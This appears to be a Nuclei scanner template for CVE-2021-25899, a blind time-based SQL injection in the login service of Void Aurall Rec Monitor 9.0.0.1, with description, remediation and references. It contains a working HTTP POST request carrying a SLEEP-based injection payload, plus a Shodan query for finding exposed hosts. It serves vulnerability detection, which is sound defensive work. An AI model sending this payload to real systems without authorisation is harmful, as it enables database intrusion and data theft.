id: CVE-2021-25899 info: name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection author: edoardottt severity: high description: | Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 - https://nvd.nist.gov/vuln/detail/CVE-2021-25899 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 epss-score: 0.50653 epss-percentile: 0.9723 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: void product: aurall_rec_monitor shodan-query: html:"AURALL" tags: cve,cve2021,sqli,void,aurall http: - raw: - | POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test matchers: - type: dsl dsl: - 'duration>=5' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and # digest: 4b0a00483046022100ccfeb1ff342bdad5db6a0d41ba0037da90cd5c3fb23b1ad0d9ba3dbb633b685c022100f36af797d6fdb1c565ffc1a02010aaa0d2fccb15adf18a1494fc5480b492078b:922c64590222798bb761d5b6d8e72950